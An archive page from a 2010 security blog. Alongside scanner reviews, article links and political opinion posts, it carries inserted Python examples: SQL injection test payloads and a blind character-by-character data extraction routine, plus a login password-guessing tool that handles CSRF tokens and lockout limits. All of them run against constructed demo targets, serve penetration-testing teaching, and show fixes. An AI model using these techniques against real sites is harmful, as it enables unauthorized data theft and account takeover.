Tech Support For Dummies

Tuesday, 30 March 2010

A couple of neat things about WebInspect

Posted on 17:14 by Unknown
If you're into finding the Web security flaws that matter, HP's WebInspect should be on your short list of prospective Web vulnerability scanners. Over the past six months WebInspect has repeatedly found a couple of items that I know I otherwise wouldn't have uncovered or been able to exploit to the extent I did.

The first is SQL injection. WebInspect does a very good job finding the actual flawed inputs but really stands out when it comes to exploiting the vulnerabilities - something that proves highly valuable during security assessments. Recently, I came across an application that had authenticated SQL injection that was only exploitable at one role level - which was, of course, the unexpected one. The following is a screenshot of WebInspect's SQL Injector in action showing its appropriately named "Data Pump" function.

You often have to tinker and be persistently patient with SQL Injector to get it to exploit a SQL injection flaw...and it does have its false-positive moments, hence the need for detailed manual verification. But man, when it gets rolling, look out.
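
As an added example (not from the original post, and not WebInspect's SQL Injector itself), here is the manual verification a tester does before trusting a scanner's SQL injection finding, followed by a minimal version of what a data-pump style exploit then does: pulling values out through a page that only ever says found or not found. The application, its SQLite schema and its data are constructed for the demonstration; `unicode()` and `substr()` are SQLite's functions, so a real target's database would need its own equivalents.

```python
"""Manual verification of a SQL injection finding, then blind extraction.

Added example; the application below is a constructed SQLite-backed
lookup standing in for whatever the real application does."""
import sqlite3

# Constructed sample schema and data (not from any real application).
SCHEMA = """
CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, role TEXT);
INSERT INTO users VALUES (1, 'alice', 'admin');
INSERT INTO users VALUES (2, 'bob', 'user');
"""


def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    return db


def lookup_vulnerable(db, username):
    """The injection point: user input pasted into the SQL text. The page
    only reveals whether a row was found, so exploitation is blind."""
    sql = "SELECT role FROM users WHERE username = '%s'" % username
    return db.execute(sql).fetchone() is not None


def lookup_fixed(db, username):
    """Parameterized query: the same input can no longer alter the SQL."""
    row = db.execute("SELECT role FROM users WHERE username = ?",
                     (username,)).fetchone()
    return row is not None


def confirm_injection(lookup, db):
    """Manual verification of a scanner finding. Two payloads differ only in
    a condition the SQL parser has to evaluate: a true positive answers
    found, then not found; a false positive answers the same both times."""
    return lookup(db, "bob' AND '1'='1") and not lookup(db, "bob' AND '1'='2")


def pump_value(lookup, db, column, table, row_offset=0, max_len=32):
    """Boolean-based blind extraction of one value, one character at a time,
    through nothing but the found/not-found oracle. A data-pump style
    exploit does exactly this over every column and row it can reach."""
    value = ""
    for pos in range(1, max_len + 1):
        matched = None
        for code in range(32, 127):                  # printable ASCII only
            payload = ("bob' AND unicode(substr((SELECT %s FROM %s ORDER BY rowid "
                       "LIMIT 1 OFFSET %d), %d, 1)) = %d AND '1'='1"
                       % (column, table, row_offset, pos, code))
            if lookup(db, payload):
                matched = chr(code)
                break
        if matched is None:
            break                                    # past the end of the value
        value += matched
    return value


if __name__ == "__main__":
    db = make_db()
    print("vulnerable confirmed:", confirm_injection(lookup_vulnerable, db))
    print("fixed confirmed:     ", confirm_injection(lookup_fixed, db))
    print("pumped username:     ", pump_value(lookup_vulnerable, db, "username", "users", 0))
```

The two-payload check is the part worth keeping in your notes: a scanner that reports an injection on an input that answers identically to `'1'='1` and `'1'='2` has given you a false positive, and no amount of tinkering with the exploit module will change that.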

The second thing about WebInspect is its ability to uncover the usage of HTTP GET requests in an otherwise POST-centric world. As with SQL Injector, some are false positives so you have to manually verify that the finding is indeed a problem. But if you can confirm the issue, your efforts will pay off because HTTP GET requests can "get" your users and your business in a real bind...It's a big enough problem and such a common finding that it inspired me to write this article: Why use POST vs. GET to keep applications secure.
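
Two of the checks used to confirm a "sensitive data over GET" finding by hand, as an added example that is not part of the original post and is not WebInspect code: whether any form on the page submits sensitive fields with GET (a form with no method attribute defaults to GET, which is easy to miss), and whether the server's own access log already holds such values in query strings, where they sit on disk and leak through browser history and Referer headers. The sensitive-name pattern, the sample HTML and the log lines are constructed for the example; the pattern is an assumption to adapt to the application's actual field names.

```python
"""Confirming sensitive data in HTTP GET requests: forms and access logs.

Added example. SENSITIVE, SAMPLE_HTML and SAMPLE_LOG are constructed
for the demonstration, not taken from any real application."""
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit, parse_qsl

# Parameter names that should never travel in a URL (assumed list; extend
# it to match the application's own naming).
SENSITIVE = re.compile(r"(pass|pwd|secret|token|ssn|card|cvv|session)", re.I)


class FormCollector(HTMLParser):
    """Collects each <form> with its method and the names/types of its inputs."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            # No method attribute means GET, per the HTML spec.
            self._current = {"action": a.get("action", ""),
                             "method": (a.get("method") or "get").lower(),
                             "inputs": []}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            self._current["inputs"].append(
                (a.get("name", ""), (a.get("type") or "text").lower()))

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def forms_sending_secrets_by_get(html):
    """Returns (action, field) pairs for GET forms that carry sensitive fields."""
    p = FormCollector()
    p.feed(html)
    hits = []
    for f in p.forms:
        if f["method"] != "get":
            continue
        for name, typ in f["inputs"]:
            if typ == "password" or SENSITIVE.search(name):
                hits.append((f["action"], name))
    return hits


LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def secrets_in_access_log(lines):
    """Returns (method, path, param) for requests whose query string holds a
    sensitive parameter: those values are now in the log file, in browser
    history and in the Referer of every outbound link from that page."""
    hits = []
    for line in lines:
        m = LOG_RE.search(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        for key, _ in parse_qsl(parts.query, keep_blank_values=True):
            if SENSITIVE.search(key):
                hits.append((m.group("method"), parts.path, key))
    return hits


# Constructed sample page: one form with no method attribute (so it submits
# via GET) carrying a password field, one harmless GET search form, and one
# login form done properly with POST.
SAMPLE_HTML = """
<form action="/login">
  <input name="user"><input type="password" name="pass">
</form>
<form action="/search" method="get"><input name="q"></form>
<form action="/login" method="post">
  <input name="user"><input type="password" name="pass">
</form>
"""

# Constructed sample access-log lines (Apache combined format).
SAMPLE_LOG = [
    '10.0.0.5 - - [30/Mar/2010:17:14:02 -0400] "GET /login?user=alice&pass=Spring2010 HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [30/Mar/2010:17:14:09 -0400] "GET /account?session=8f3a HTTP/1.1" 200 1204 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [30/Mar/2010:17:15:11 -0400] "POST /login HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [30/Mar/2010:17:15:30 -0400] "GET /search?q=webinspect HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    print(forms_sending_secrets_by_get(SAMPLE_HTML))
    print(secrets_in_access_log(SAMPLE_LOG))
```

The log check is the one that turns a scanner finding into something the business understands: a scanner saying "GET is used" is abstract, a line from last night's log with a real user's password in it is not. Remember that a server which accepts the same parameters by GET even though the form uses POST has the same exposure, so test the endpoint, not just the form.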

I could go on with more good things about WebInspect but I'll save that for another time. Until then, don't forget my firm belief that you almost always get what you pay for when it comes to Web vulnerability scanners...there's just too much at stake not to invest in a good tool such as this.
Posted in cool products, penetration testing, security testing tools, web application security | No comments

Monday, 29 March 2010

Don't forget about XSS *behind* the login prompt

Posted on 08:40 by Unknown
Don't assume that your Web security concerns stop at the login prompt. Here's a new piece I wrote where I talk about cross-site scripting (XSS) and whether or not it matters for logged-in users:

Authenticated XSS - problem or not?
Posted in cross-site scripting, penetration testing, vulnerability assessments, web application security | No comments

Got Linux security on your mind?

Posted on 03:05 by Unknown
Here's a new webcast and accompanying podcast I recently recorded for SearchEnterpriseLinux.com where I share some insight and opinions regarding the biggest weaknesses I'm seeing with Linux today...and what you can do about it:

Tightening down Linux security (webcast)

Tightening down Linux security (podcast)
Posted in Linux, security assessments, vulnerability assessments | No comments

Saturday, 27 March 2010

Windows DirectAccess - VPN killer or not?

Posted on 08:25 by Unknown
Here's a new piece I wrote for SearchEnterpriseDesktop.com on Windows 7's/2008's new DirectAccess app:

Using Windows 7's DirectAccess to enhance the mobile user experience

...it's actually pretty cool and worth checking out.
Posted in mobile security, remote access security, telecommuting, Windows 7 | No comments

Friday, 26 March 2010

Why the rich keep getting richer and the poor keep getting poorer

Posted on 10:00 by Unknown
Contrary to what Senator Max Baucus (Democrat) recently said about the forthcoming healthcare deform that's being forced upon us:
“Too often, much of late, the last couple three years the mal-distribution of income in America is gone up way too much, the wealthy are getting way, way too wealthy, and the middle income class is left behind. Wages have not kept up with increased income of the highest income in America. This legislation will have the effect of addressing that mal-distribution of income in America.”

The rich keep getting richer because they keep doing the things that make them rich. The poor keep getting poorer because they keep doing the things that make them poor. It's basic logic just like the "secret" to losing weight: eat less, exercise more. People just don't get these basics of life. It's why so many people buy into the nonsense the diet companies and politicians "feed" us. This mindset explains why this book and its philosophy make so much sense.

Everything in life is a personal choice. Where we are in life today is the exact sum of all the choices we've made up to this point.

Interestingly, information security is no different - you choose the behavior (i.e. ignoring the problem) you choose the consequence (i.e. security breach).


Posted in government regulations, politics, security leadership, stupid security, success | No comments

I do not like it Uncle Sam

Posted on 06:32 by Unknown
Here's a good one going around the Internet that I just love:

I do not like it Uncle Sam, I do not like it Sam I am. I do not like these dirty crooks, I do not like how they cook books. I do not like when Congress steals, I do not like their secret deals. I do not like this Speaker Nan, I do not like this 'YES WE CAN'! I do not like this kind of hope, I do not like it, nope! Nope! Nope!
Posted in government regulations, politics | No comments

Great tool to check for weak Web passwords

Posted on 05:46 by Unknown
I've always been a fan of Acunetix Web Vulnerability Scanner. It's a lesser-known tool that packs a big punch. One of its most redeeming qualities is its password checking. As I mentioned in this post, Acunetix Web Vulnerability Scanner took what was going to be a basic assessment of an Outlook Web Access system with very few findings up many notches into a true penetration of the system...all thanks to the built-in password checks it does by default.

I've since had other scenarios where it has done the same thing and left me wondering why aren't other scanners finding these holes!?

The following screenshot shows some of the Acunetix Web Vulnerability Scanner password check policy settings.
The scanner not only checks for weak Web passwords but also weak FTP, POP3, SMTP, telnet and other passwords as well.

I'm still waiting for some good brute-force checks built into these tools (a la Brutus) and - especially - better handling of login forms. If/when this occurs I honestly think we could eliminate a huge chunk of the directly-exploitable Web flaws out there. In fact, I'm really surprised that other scanners aren't doing more in this area.

I'm confident that many - if not most - Web sites/apps that are deemed "secure" are just one weak password away from getting hacked...the weak passwords are there, they're just being overlooked. Unless and until we start seeing better password-cracking capabilities built into all mainstream Web vulnerability scanners this flaw will remain and surface its ugly head in any given system. It's just a matter of time.
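
To show what "better handling of login forms" looks like in practice, here is an added example (not from the original post, and not Acunetix's or Brutus's code): a dictionary check that re-fetches the form before every attempt so one-time hidden tokens are honoured, decides success by comparing the response body against a known-failure baseline rather than trusting status codes, and stops short of an assumed lockout threshold. The `FakeApp` class, its users, its lockout value and the wordlist are all constructed for the demonstration and stand in for a real site reached over HTTP.

```python
"""Form-aware weak-password check against a constructed login application.

Added example. FakeApp is a stand-in for a real login form: it requires a
hidden one-time token minted on GET, returns HTTP 200 for success and
failure alike (so status codes tell the checker nothing), and locks an
account after LOCKOUT failures."""
import secrets
from html.parser import HTMLParser


class FakeApp:
    LOCKOUT = 5            # assumed lockout policy of the constructed target

    def __init__(self, users):
        self.users = users          # constructed username -> password map
        self.tokens = set()         # currently valid one-time form tokens
        self.failures = {}          # failed attempts per username

    def get_login(self):
        """GET /login: the form, with a fresh hidden token each time."""
        tok = secrets.token_hex(8)
        self.tokens.add(tok)
        return ('<form method="post" action="/login">'
                '<input type="hidden" name="csrf" value="%s">'
                '<input name="user"><input type="password" name="pass">'
                '</form>' % tok)

    def post_login(self, fields):
        """POST /login: returns (status, body); 200 whether or not it worked."""
        if fields.get("csrf") not in self.tokens:
            return 200, "<p>Invalid request</p>"
        self.tokens.discard(fields["csrf"])       # token is single-use
        user = fields.get("user", "")
        if self.failures.get(user, 0) >= self.LOCKOUT:
            return 200, "<p>Account locked</p>"
        if user in self.users and self.users[user] == fields.get("pass"):
            return 200, "<p>Welcome, %s</p>" % user
        self.failures[user] = self.failures.get(user, 0) + 1
        return 200, "<p>Invalid username or password</p>"


class HiddenFields(HTMLParser):
    """Pulls every hidden input (CSRF tokens, view state, etc.) out of a form."""

    def __init__(self):
        super().__init__()
        self.hidden = {}

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "input" and (a.get("type") or "").lower() == "hidden":
            self.hidden[a.get("name", "")] = a.get("value", "")


def hidden_fields(html):
    p = HiddenFields()
    p.feed(html)
    return p.hidden


def check_weak_passwords(app, usernames, wordlist, max_tries_per_user=4):
    """Returns {username: password} for every account a wordlist entry opened.
    max_tries_per_user is kept below the target's assumed lockout threshold."""
    # One deliberately wrong attempt establishes what a failure looks like.
    probe = hidden_fields(app.get_login())
    probe.update({"user": usernames[0], "pass": secrets.token_hex(16)})
    _, failure_body = app.post_login(probe)

    found = {}
    for user in usernames:
        for candidate in wordlist[:max_tries_per_user]:
            fields = hidden_fields(app.get_login())     # fresh token per attempt
            fields.update({"user": user, "pass": candidate})
            _, body = app.post_login(fields)
            if "locked" in body.lower():
                break                    # back off rather than burn the account
            if body != failure_body:
                found[user] = candidate  # anything that is not a failure is a hit
                break
    return found


if __name__ == "__main__":
    app = FakeApp({"admin": "Password1", "kevin": "x9!Lq#7Tz$", "bob": "bob"})
    print(check_weak_passwords(app, ["admin", "kevin", "bob"],
                               ["password", "Password1", "bob", "123456"]))
```

A scanner that skips the token, or that treats every HTTP 200 as a failure, reports this application as clean. Those two details, plus respecting the lockout policy so the test doesn't turn into a denial of service against real users, are most of what separates a useful login-form check from a useless one.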
Posted in cool products, passwords, penetration testing, security testing tools, vulnerability assessments, web application security | No comments

What's the biggest Web vulnerability?

Posted on 05:02 by Unknown
Here's a new piece I wrote called The Top Web Vulnerability We Face. It's something I suspect will be around for a long, long time. I'm curious if you agree?
Posted in stupid security, web application security, web server security | No comments

Tuesday, 23 March 2010

Users *have* to start locking their screens when working remotely

Posted on 12:16 by Unknown
To continue with the message in this previous post about users locking their screens while away from their computers, I'm amazed at how naive people are with their computer usage in public places.

I see it practically every time I'm at a coffee shop - someone leaves his/her laptop sitting at the table while he/she goes out to take a phone call, use the restroom, smoke a cigarette or talk with an employee across the store, and provides someone with ill intent enough time to snatch the computer away or, in some cases, sit there and monkey around with the computer.

All it takes is about 60 seconds for someone to hop onto an unsecured computer, access sensitive files stored locally or via the corporate VPN and then delete them or email them out.

Combine this vulnerability with unencrypted hard drives and Microsoft's new always-on mobile intranet connection called DirectAccess and you've got yourself a big problem on your hands.
Posted in locking screens, mobile security, stupid security, user awareness, Windows 7, windows security | No comments

Check out my new Web application security ebook

Posted on 10:14 by Unknown
Hot off the press...OK, hot off the computer - I've written an ebook on Web application security threats published by SearchSoftwareQuality.com - a great application development/QA site that's part of the TechTarget family.

Download it and learn more about:

  • New Web application security challenges
  • Assessing your Web application security
  • Beating common Web security attacks
  • Hacking your own applications
  • Web application security best practices
It's free - just sign up for it at Bitpipe.com.
Posted in Kevin's books, web application security, whitepapers | No comments

Great quote on business and career success

Posted on 07:59 by Unknown
Harold Geneen once said "In business, words are words, explanations are explanations, promises are promises, but only performance is reality."

Reminds me just how cheap talk can be when the marketing machine gets its way - especially with "cloud computing". Look more at the actions of businesses and people and less at the words. There you'll find what they're made of.
Posted in careers, cloud computing, customer no service, marketing hype, security leadership, success | No comments

Monday, 22 March 2010

Our power of choice has been stripped

Posted on 08:14 by Unknown
No need for us to think any more. Here's a great excerpt from a WSJ piece that underscores the issue:

"In our world of infinite wants but finite resources, there are only two ways to allocate any good or service: either through prices and the choices of millions of individuals, or through central government planning and political discretion."

You hear me say a lot that those in control of information security have a choice in the matter...and, as Dr. Phil McGraw says, you choose the behavior you choose the consequences. So be it.

But we individuals in our own personal lives here in America are losing our ability to choose. It's our new reality with Obamacare and, I suspect, many many other things to come. The politicians know better than the people...and it's all our fault.

I'm going to miss the days when we were in control of ourselves...when we were free.

You probably think I'm crazy. I really don't believe I am...I just see what has happened since the beginning and understand what all of this government control will lead us to. The decisions made this weekend will change our country deeply forever. Everyone will understand sooner or later.
Posted in government regulations, politics, scary stuff, stupid security | No comments

Are you destroying your backup media the right way?

Posted on 07:39 by Unknown
Here's a recent podcast I recorded on backup media data destruction...better be sure you're doing it the right way:

Ensuring proper data deletion or destruction of backup media
Posted in backups, compliance, data destruction, Kevin's security content, storage security | No comments

A sincere "Thanks!"

Posted on 04:30 by Unknown

Frederic Bastiat once said "When plunder becomes a way of life for a group of men living together in society, they create for themselves in the course of time a legal system that authorizes it and a moral code that justifies it."

In the same spirit, I want to send out a sincere and heartfelt Thanks! to all my fellow Americans who voted for "Hope" and "Change" putting a Marxist-loving community organizer into power that has led to the passing of this healthcare "reform" monstrosity.

Specifically,

  • I want to thank all the people who cannot think long term.
  • I want to thank all the people who do not take responsibility for their own choices and actions.
  • I want to thank all the people who vote for a living.
  • I want to thank all the people who use the police power of government to mooch off of others who actually work for a living.
  • I want to thank all the people who believe that government can solve all their problems.
  • I want to thank all the people whose selfish dependence on government takes top priority above all.
  • I want to thank all the people for supporting politicians who want to force their ideals upon us for the sole reason of gaining control of us and maintaining their own political power.
  • I want to thank all the people for supporting politicians who could only pass a bill by manipulating and cheating a well-defined set of rules and procedures.
  • I want to thank all the people who believe that Socialism and Communism are "other people's problems" - things that America could never evolve into.
  • I want to thank all the people who voted for George W. Bush and all the other spineless Republicans who have played a big part in where we're at today.
And finally,
  • I want to thank all the people whose desire for "Hope" and "Change" have helped diminish the opportunities this country had to offer my kids and my future grandkids and, instead, created a scenario for everyone to work harder with less payoff.

I'm just furious at what we've let this country become. The wars that have been fought...the lives that have been lost...the toil our Founding Fathers endured....All of that to end up like this.

Shame on us.


Posted in government regulations, politics, scary stuff, stupid security | No comments

Email security - using content filtering and incident response to round things out

Posted on 03:34 by Unknown
Here are some recent bits I wrote for SearchWinIT.com and SearchExchange.com to help you flesh out the security of your email environment:

The state of email content filtering - and what you can do

Solidify your Exchange email server incident response plan
Posted in employee monitoring, exchange, incident response, Kevin's security content, security policies | No comments

Friday, 19 March 2010

All the reasons you need to NOT buy security products

Posted on 14:11 by Unknown
We've all been subjected to the marketing hype the IT and security product vendors put out daily...Well, if you've been looking for ways to save some money, here's why you should not buy information security products:

9 good reasons not to buy information security products

...the marketing madness will never cease. We just have to grow wise and understand what to buy into and what to ignore.
Posted in compliance, Kevin's security content, marketing hype, stupid security, vendors | No comments

New tips on 4 facets of encryption

Posted on 10:49 by Unknown
Been wondering about the latest on mobile/backup/database/email encryption? Well, here are some recent tips I wrote for TechTarget that'll help you get the ball rolling:

Securing SMB laptops

Securing removable media with BitLocker To Go

Secure your data backups with encryption key management best practices

Encryption – the great security control that nobody’s using

The true value of transparent data encryption

Is full email encryption the solution to Exchange security?
Posted in backups, bitlocker, compliance, database security, drive encryption, encrypting data in transit, Kevin's security content, sql server | No comments

No need to fix the problem, just ban the tool

Posted on 04:43 by Unknown
Here's a great post from my colleague Dave Paradi talking about how a conference is banning presenters from using PowerPoint. It's an embedded systems conference. So they're telling these highly-technical people they can't use PowerPoint to get their messages across!? I suspect the audience will instead be subjected to overhead transparencies and slide rule demonstrations. Sounds like a great show!

This is just like businesses banning thumb drives and instant messaging on their networks. The ignorant powers that be proclaim "This stuff is too risky so we're going to ban it." Instead of fixing the problem at a higher level and putting in the proper controls to minimize such risks they just ban the technologies altogether.

It'll be tough for presenters at this conference to "sneak" PowerPoint into their presentations. But what happens when computer users are told they can't use certain hardware or software? They find a workaround and do it anyway because the problem isn't addressed at the right level. And thus the cycle continues. Amazing stuff.
Posted in presentations, security leadership, stupid security | No comments

Thursday, 11 March 2010

Unexpected vulnerabilities in the cloud?

Posted on 09:34 by Unknown
When you look past all the ridiculous hype and craze over "cloud computing" the realities set in. Here's a new piece I wrote for SearchCompliance.com that can help set you straight:

Find unexpected vulnerabilities to ensure cloud compliance
Posted in cloud computing, compliance, Kevin's security content, marketing hype | No comments

Twitter stole my Twitter idea

Posted on 08:29 by Unknown
I was recently talking to a client about how we need to start up a company with a Twitter acquisition as our exit strategy that scans for malicious URLs in the tinyurl, bit.ly, etc. links that are posted on Twitter. Twitter beat us to the punch. It's actually pretty difficult to comprehend that it's taken them this long to fix such a big problem. Nice to see some innovation where it's really needed.
Posted in malware, twitter, web application security | No comments

Trouble getting policy buy-in? Make 'em self-executing.

Posted on 08:00 by Unknown
If you're having trouble getting security policies on the radar of management and users - much less getting the real buy-in you need, don't fret - there is a possible solution.

It's an idea I got from Louise Slaughter (good name for a politician) and her attempt to force Obamacare on us. Simply make your policies "self-executing". In other words, you write the policies and include verbiage in each one that makes them take effect without any buy-in, votes, or opinions whatsoever.

Imagine if it were this simple for anyone but politicians to manipulate the system in their favor. Now that would be information security change we could believe in!
Posted in government regulations, politics, security policies, stupid security | No comments